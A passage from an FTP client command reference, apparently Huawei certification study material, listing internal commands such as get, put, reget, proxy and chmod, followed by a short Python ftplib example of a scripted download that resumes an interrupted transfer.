4. append local-file [remote-file]: Append a local file to a file on the remote host; if the remote file name is not specified, the local file name is used.
5. ascii: Use the ASCII transfer type.
6. bell: Ring the bell once after each command is executed.
7. bin: Use the binary transfer type.
8. bye: Exit the ftp session.
9. case: Convert upper-case letters in remote host file names to lower case when using mget.
10. cd remote-dir: Change to the directory remote-dir on the remote host.
11. cdup: Change to the parent of the current remote directory.
12. chmod mode file-name: Set the access mode of the remote file file-name to mode, e.g.: chmod 777 a.out.
13. close: Terminate the ftp session with the remote server (the counterpart of open).
14. cr: Convert carriage returns to line feeds when transferring files in ASCII mode.
15. delete remote-file: Delete a file on the remote host.
16. debug [debug-value]: Set debugging mode, which displays each command sent to the remote host, e.g.: debug 3; setting it to 0 turns debugging off.
17. dir [remote-dir] [local-file]: Display the remote directory listing and store the result in a local file.
18. disconnect: Same as close.
19. form format: Set the file transfer form to format; the default is file.
20. get remote-file [local-file]: Transfer remote-file from the remote host to local-file on the local disk.
21. glob: Toggle filename expansion (globbing) for mdelete, mget and mput; off by default, same as the -g command-line parameter.
22. hash: Display a hash mark (#) for every 1024 bytes transferred.
23. help [cmd]: Display help for the ftp internal command cmd, e.g.: help get.
24. idle [seconds]: Set the remote server's inactivity timer to seconds seconds.
25. image: Set the binary transfer type (same as binary).
26. lcd [dir]: Change the local working directory to dir.
27. ls [remote-dir] [local-file]: Display the remote directory remote-dir and store the listing in the local file local-file.
28. macdef macro-name: Define a macro; the definition ends at the first empty line after macdef.
29. mdelete [remote-file]: Delete files on the remote host.
30. mdir remote-files local-file: Similar to dir, but more than one remote file can be specified, e.g.: mdir *.o *.zip outfile.
31. mget remote-files: Transfer multiple remote files.
32. mkdir dir-name: Create a directory on the remote host.
33. mls remote-file local-file: Same as nlist, but multiple file names can be specified.
34. mode [modename]: Set the file transfer mode to modename; the default is stream.
35. modtime file-name: Display the last modification time of the remote file.
36. mput local-file: Transfer multiple local files to the remote host.
37. newer file-name: Re-fetch file-name from the remote host only if it was modified more recently than the file of the same name on the local disk.
38. nlist [remote-dir] [local-file]: Display a list of the files in the remote directory and store it in local-file on the local disk.
39. nmap [inpattern outpattern]: Set the file name mapping mechanism so that certain characters of file names are transformed during transfer, e.g.: nmap $1.$2.$3 [$1,$2].[$2,$3]; transferring the file a1.a2.a3 then yields the file name a1.a2. This command is especially useful when the remote host is not a UNIX machine.
40. ntrans [inchars [outchars]]: Set the translation mechanism for file name characters, e.g.: ntrans L R turns the file name LLL into RRR.
41. open host [port]: Establish a connection to the specified ftp server; the port can be specified.
42. passive: Enter passive transfer mode.
43. prompt: Toggle interactive prompting for multiple-file transfers.
44. proxy ftp-cmd: Execute an ftp command on a secondary control connection; this allows connecting to two ftp servers in order to transfer files between them. The first proxy command must be open, to establish the connection to the second server.
45. put local-file [remote-file]: Transfer local-file to the remote host.
46. pwd: Display the current working directory on the remote host.
47. quit: Same as bye; exit the ftp session.
48. quote arg1 arg2 ...: Send the arguments verbatim to the remote ftp server, e.g.: quote syst.
49. recv remote-file [local-file]: Same as get.
50. reget remote-file [local-file]: Similar to get, but if local-file already exists the transfer resumes from the point where it was last interrupted.
51. rhelp [cmd-name]: Request help from the remote host.
52. rstatus [file-name]: Display the status of the remote host if no file name is given; otherwise display the status of the file.
53. rename [from] [to]: Rename a remote host file.
54. reset: Clear the reply queue.
55. restart marker: Restart the following get or put at the specified marker, e.g.: restart 130.
56. rmdir dir-name: Delete a directory on the remote host.
57. runique: Store received files under unique names: if the file already exists, the suffix .1, .2, etc. is appended to the original name.
58. send local-file [remote-file]: Same as put.
59. sendport: Toggle the use of the PORT command.
60. site arg1 arg2 ...: Send the arguments verbatim to the remote ftp host as a SITE command, e.g.: site idle 7200.
61. size file-name: Display the size of the remote host file.
62. status: Show the current ftp status.
63. struct [struct-name]: Set the file transfer structure to struct-name; by default the stream structure is used.
64. sunique: Store files on the remote host under unique names (the counterpart of runique).
65. system: Display the type of operating system on the remote host.
66. tenex: Set the file transfer type to the one required by TENEX machines.
67. tick: Toggle the byte counter during transfers.
68. trace: Toggle packet tracing.
69. type [type-name]: Set the file transfer type to type-name; the default is ascii, e.g.: type binary sets binary transfer.
70. umask [newmask]: Set the default umask on the remote server to newmask, e.g.: umask 3
71. user user-name [password] [account]: Identify yourself to the remote host; the password must be entered when the host requires it, e.g.: user anonymous my@email.
72. verbose: Same as the -v command-line parameter, i.e. verbose reporting mode in which all responses from the ftp server are displayed to the user; on by default.
73. ? [cmd]: Same as help.
author: Huawei certification preparation materials https://www.bilibili.com/read/cv15485855?spm_id_from=333.999.0.0 source: bilibili
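The internal commands above as a non-interactive session, as an added example that is not part of the original page: Python's ftplib drives open/user/passive/cd/binary/quit, and reget is implemented as REST plus RETR, which is what ftplib sends when retrbinary is given a rest offset. Host, credentials, directory and file names are assumed placeholders.

```python
"""Added example, not part of the original page: a non-interactive FTP
download with Python's ftplib that mirrors the internal commands above
(open, user, passive, cd, binary, hash, reget, quit). Host, credentials
and file names are placeholders chosen for this example."""
import os
from ftplib import FTP

def resume_offset(local_file):
    """Byte offset to resume from: bytes already on disk, or 0 (reget semantics)."""
    return os.path.getsize(local_file) if os.path.exists(local_file) else 0

def hash_marks(total_bytes, block=1024):
    """How many '#' marks the 'hash' command prints for total_bytes transferred."""
    return total_bytes // block

def reget(ftp, remote_file, local_file):
    """Resume remote_file into local_file; returns the bytes fetched by this call."""
    offset = resume_offset(local_file)
    fetched = 0
    with open(local_file, "ab") as fh:          # append to the partial file
        def on_block(data):
            nonlocal fetched
            fh.write(data)
            fetched += len(data)
        # rest=offset makes ftplib send "REST <offset>" before "RETR <file>"
        ftp.retrbinary("RETR " + remote_file, on_block, rest=offset or None)
    return fetched

def scripted_session(host, user, password, remote_dir, remote_file, local_file):
    """Equivalent of 'ftp -n host' followed by user/passive/cd/bin/reget/quit."""
    ftp = FTP()                      # no auto-login, like the -n switch
    ftp.connect(host, 21)            # open host
    ftp.login(user, password)        # user user-name password
    ftp.set_pasv(True)               # passive
    ftp.cwd(remote_dir)              # cd remote-dir
    ftp.voidcmd("TYPE I")            # binary / bin / image
    fetched = reget(ftp, remote_file, local_file)
    print("#" * hash_marks(fetched)) # what 'hash' would have shown
    ftp.quit()                       # quit / bye
    return fetched
```

Run scripted_session against a reachable server to see the resume in action: interrupt a download, run it again, and only the remaining bytes are transferred.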